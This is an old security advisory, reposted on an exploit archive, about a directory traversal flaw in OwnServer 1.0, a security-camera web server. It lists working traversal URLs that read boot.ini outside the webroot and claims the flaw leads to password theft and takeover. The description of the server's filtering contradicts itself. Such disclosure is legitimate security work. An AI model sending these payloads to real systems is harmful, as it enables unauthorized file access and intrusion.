OwnServer10.txt

OwnServer10.txt: Posted Jan 21, 2004; Authored by Rafel Ivgi | Site theinsider.deep-ice.com; OwnServer, a web server used for watching security cameras remotely, is susceptible to a directory traversal bug that allows a remote attacker to gain access to files outside of the webroot.; tags | exploit, remote, web; SHA-256 | b32b6045df134cd7484a3ae7c2e8bfa669777d8d1b0a5b081d9961a173b87d02; Download | Favorite | View

OwnServer10.txt

#######################################################################

Application:    OwnServer (Used By Security Cameras Products)
Vendors:        https://www.anteco.co.il
Big Resellers:
                      https://www.anykeeper.com
                      https://www.sahar-systems.co.il

Versions:        <= 1.0
Platforms:       Windows
Bug:                Directory Transversal Vulnerability
Risk:                High
Exploitation:    Remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                https://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============


OwnServer is a web server used as a webserver for watching security cameras
remotly.
It allows broadcasting live streaming video on the web through the built-in
webserver.


#######################################################################

======
2) Bug
======

The webserver uses a protection to avoid the directory traversal bug.
"//"  is replaced to  ""
"\." and "\.."  is replaced to  ""
"\"  is replaced to  "/"
"\\"  is replaced to  "//"

The webserver uses no protection to avoid the directory traversal bug.
The problem happens when the attacker uses the classic pattern "/../" that
allows him to see and download any file in the remote system knowing the
path.
This allows any attacker to : Read and download any local file, and in most
cases retrieve the machine's password files and invade it (using
ssh,ftp,http,netbios,samba etc...).

#######################################################################

===========
3) The Code
===========

https://<host>/../../boot.ini
https://<host>/../../../boot.ini
https://<host>/../../../../boot.ini
https://<host>/../../../../../boot.ini
https://<host>/../../../../../../boot.ini

#######################################################################

---
Rafel Ivgi, The-Insider
https://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 55 files
LiquidWorm 20 files
Debian 18 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

OwnServer10.txt

OwnServer10.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OwnServer10.txt

Share This

OwnServer10.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems